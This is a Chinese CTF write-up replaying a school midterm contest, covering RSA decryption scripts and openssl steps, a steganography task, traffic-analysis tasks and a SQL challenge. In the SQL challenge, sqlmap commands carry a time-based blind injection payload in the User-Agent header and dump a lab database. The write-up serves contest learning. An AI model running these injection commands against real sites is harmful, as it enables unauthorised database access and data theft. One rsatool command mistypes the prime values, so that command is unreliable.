云曦期中考复现

Crypto_Singin

打开得到文本,使用unicode编码解码

\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0032\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0034\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0035\u0033\u0031\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0031\u0033\u0035\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0035\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0036\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0031\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0036\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0034\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0036\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0036\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0036\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0032\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0031\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0035\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0035\u0033\u0031\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0033\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0032\u0033\u0032\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0034\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0034\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0036\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0039\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0035\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0039\u0033\u0030\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0031\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0036\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0031\u0033\u0030\u0033\u0034\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0037\u0033\u0037\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0038\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0034\u0033\u0038\u0033\u0062\u0032\u0036\u0032\u0033\u0033\u0036\u0033\u0031\u0033\u0062

得到

262339303b26233130393b26233132303b26233130343b262339303b262335313b26233131353b262335303b262339303b262336383b262339393b26233131393b262339303b26233130363b262338393b262334383b262339303b262336383b26233130383b26233130373b262337373b262338373b262339303b26233130363b262337383b262336383b262337373b26233132303b262339303b262337313b262338353b262335313b262339303b262338373b262337333b26233132323b262338393b262338343b262338393b262334383b262337373b262336383b262338393b262335303b262339303b262337313b262338363b26233130343b262337373b262338383b262334383b262336313b

在使用cyberchef解码得到flag

easy_rsa

打开得到

n= 703739435902178622788120837062252491867056043804038443493374414926110815100242619
e= 59159
c= 449590107303744450592771521828486744432324538211104865947743276969382998354463377
m=???

 RSA算法,已知n,e,c求m

脚本

import gmpy2
from Crypto.Util.number import *

n= 703739435902178622788120837062252491867056043804038443493374414926110815100242619
e= 59159
c= 449590107303744450592771521828486744432324538211104865947743276969382998354463377
p=782758164865345954251810941
q =810971978554706690040814093
r =1108609086364627583447802163

phi =(p-1)*(q-1)*(r-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print (d)
print (m)
print (long_to_bytes(m))

 Rsa2--网鼎杯第3场-_hafuhafu__(生成pem)

打开得到

pk = (25572000680139535995611501720832880791477922165939342981900803052781801299380515116746468338767634903543966903733806796606602206278399959935132433794098659859300196212479681357625729637405673432324426686371817007872620401911782200407165085213561959188129407530503934445657941975876616947807157374921539755157591354073652053446791467492853468641331291383821277151309959102082454909164831353055082841581194955483740168677333571647148118920605752176786316535817860771644086331929655259439187676703604894258185651165017526744816185992824404330229600417035596255176459265305168198215607187593109533971751842888237880624087,65537)
------ enc -------
DTlEiAKLE24m19es4TBWl4Uo2MvmQMEYqWBCFggWJlJSjCwl3fT9322ytgudiQW2raDh53e6t2ed
ygpFOP+MsAPXlU469rlmVng5JyDl0CF0ypevnaM5i+CvNT2mBoDadIYnPBVGMtj9HVVPDpMIgv5b
F9N5ddQS7JB21oDdQBdDLTkKvcSqegtjNFv04R8+yrqOMZYpzdCRRw0j/MMt2JefC6z36mjrTL85
A9EKlwKg5ydW7qELycfjBvzB/cwJ7mJ2I0xVPToa3sSLNDyddFttATwU6wmCa4XaWpTwVR/PfET2
FRj0p+8UwYSDdlLLh6gRUVURpT+2jc9zx/rhOw==   #这是密文

利用网站生成pq

factordb.com

p=149930380465516707151079321019435489399072155945793735032334088844599773034021170995501688132861944516938448679935403246643441984203770825485165700862168437691254557323938150173733659070945061763789341407547559935070758242521126066900261360899379463301621378242061934281538210192731229473900396425739817670867

q=170559166199281256887953076784727902849936084815549184550874370897326056825177365209113910954088389779180174518262922176726833811470419181874717574929460298509184863124213663255559781224744696195678069242025195218017449489985102637547369070225979448169459840545693721393354651993457943927480894225788038743661

接着我们利用rsatool来生成pem文件

python rsatool.py -p 49930380465516707151079321019435489399072155945793735032334088844599773034021170995501688132861944516938448679935403246643441984203770825485165700862168437691254557323938150173733659070945061763789341407547559935070758242521126066900261360899379463301621378242061934281538210192731229473900396425739817670867 -q q=170559166199281256887953076784727902849936084815549184550874370897326056825177365209113910954088389779180174518262922176726833811470419181874717574929460298509184863124213663255559781224744696195678069242025195218017449489985102637547369070225979448169459840545693721393354651993457943927480894225788038743661 -e 65537 -o pen.pem

然后我们把密文单独复制出来命名为enc 对其进行base64解码,将它输出为flag.enc文件 

openssl enc -base64 -d -in enc -out flag.enc 
#其进行base64解码,将它输出为flag.enc文件
openssl pkeyutl -decrypt -in flag.enc -inkey pen.pem -out flag.txt
#进行解密
cat flag.txt
#读取

简简单单的sql

SQL题,做了很多次,BP爆破,注入都没有(就没找到注入点在哪儿),使用sqlmap进行注入,打开环境什么都没有,使用dirsearch扫描得到login.php,访问

输入admin\123456进行抓包

将抓到的包保存在sql.txt文件里

POST /login.php HTTP/1.1
Host: 172.16.17.6:8304
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://172.16.17.6:8304
Connection: close
Referer: http://172.16.17.6:8304/login.php
Cookie: session=14534a55-954a-4e31-a4dd-b573d8000856.9ySv9PoN4KOz3V6wgwfUCJfbmcg
Upgrade-Insecure-Requests: 1

username=admin&password=12346

打开sqlmap

sqlmap -r /home/kali/桌面/sql.txt --level 3

我们可以发现注入点是在UA头里进行时间盲注的,我们直接指定UA头,进行爆所有的数据库

sqlmap -r /home/kali/桌面/sql.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --dbs

得到5个数据库

[*]challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

接着爆爆现在所处的数据库 

sqlmap -r /home/kali/桌面/sql.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --current-db

当前数据库为 challenges

下一步接着爆表

sqlmap -r /home/kali/桌面/sql.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges --tables

得到两张表,不知道在哪一张,一张一张的找,找了在第一个表里

+-------------+
| user_agents |
| users       |
+-------------+

爆字段

sqlmap -r /home/kali/桌面/sql.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents --columns

+------------+-------------+
| Column     | Type        |
+------------+-------------+
| id         | int(3)      |
| user_agent | varchar(40) |
+------------+-------------+

长度为40的为flag,直接报字段内容得到flag

sqlmap -r /home/kali/桌面/sql.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents -C user_agent --dump

Xjpg

题目提示f5,猜测f5隐写,使用F5-steganography解密

 

打开txt文件得到一堆乱码,用010打开

看到了pk头,把文件改为zip文件,再解压成了一个txt文件

使用brainfuck解码得到flag

流量分析1

打开附件使用wireshark分析,发现666.zip文件,打开后得到6个txt文件,分别查看6个txt文件,发现1.txt文件为png的头部(89 50 4E 47),6.txt为png的尾部(AE 42 60 82),意思就是6.txt为一个png文件

把十六进制导入010转换为png文件,得到一张二维码,扫描得到flag

流量分析2 

wireshark打开分析,是sql盲注的流量分析

过滤一下包含flag的http

盲注一个一个字符去尝试,当从(1,1)到(2,1)时,说明第一个字符正确

根据ACill表,102对应的是f,依次对照下去得到flagflag{skysql_is_very_cool!233}

流量分析3

下载得到rar文件,重命名并解压得到两个文件,打开flag.docx发现需要密码

进行流量分析去找密钥,发现USB,直接USB解密得到密码,打开flag文件得到flag

  • 26
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示 社会的发展和科学技术的进步,互联网技术越来越受欢迎。手机也逐渐受到广大人民群众的喜爱,也逐渐进入了每个用户的使用。手机具有便利性,速度快,效率高,成本低等优点。 因此,构建符合自己要求的操作系统是非常有意义的。 本文从管理员、用户的功能要求出发,4S店客户管理系统中的功能模块主要是实现管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理,用户客户端:首页、车展、新闻头条、我的。门店客户端:首页、车展、新闻头条、我的经过认真细致的研究,精心准备和规划,最后测试成功,系统可以正常使用。分析功能调整与4S店客户管理系统实现的实际需求相结合,讨论了微信开发者技术与后台结合java语言和MySQL数据库开发4S店客户管理系统的使用。 关键字:4S店客户管理系统小程序 微信开发者 Java技术 MySQL数据库 软件的功能: 1、开发实现4S店客户管理系统的整个系统程序; 2、管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理等。 3、用户客户端:首页、车展、新闻头条、我的 4、门店客户端:首页、车展、新闻头条、我的等相应操作; 5、基础数据管理:实现系统基本信息的添加、修改及删除等操作,并且根据需求进行交流信息的查看及回复相应操作。
现代经济快节奏发展以及不断完善升级的信息化技术,让传统数据信息的管理升级为软件存储,归纳,集中处理数据信息的管理方式。本微信小程序医院挂号预约系统就是在这样的大环境下诞生,其可以帮助管理者在短时间内处理完毕庞大的数据信息,使用这种软件工具可以帮助管理人员提高事务处理效率,达到事半功倍的效果。此微信小程序医院挂号预约系统利用当下成熟完善的SSM框架,使用跨平台的可开发大型商业网站的Java语言,以及最受欢迎的RDBMS应用软件之一的MySQL数据库进行程序开发。微信小程序医院挂号预约系统有管理员,用户两个角色。管理员功能有个人中心,用户管理,医生信息管理,医院信息管理,科室信息管理,预约信息管理,预约取消管理,留言板,系统管理。微信小程序用户可以注册登录,查看医院信息,查看医生信息,查看公告资讯,在科室信息里面进行预约,也可以取消预约。微信小程序医院挂号预约系统的开发根据操作人员需要设计的界面简洁美观,在功能模块布局上跟同类型网站保持一致,程序在实现基本要求功能时,也为数据信息面临的安全问题提供了一些实用的解决方案。可以说该程序在帮助管理者高效率地处理工作事务的同时,也实现了数据信息的整体化,规范化与自动化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值